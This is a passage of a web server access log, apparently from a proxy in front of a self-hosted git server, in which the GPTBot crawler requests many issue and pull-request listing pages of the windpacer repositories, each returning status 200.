192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=rendered" [Client 74.7.227.38] [Length 17071] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:19:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" -[17/Feb/2026:19:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 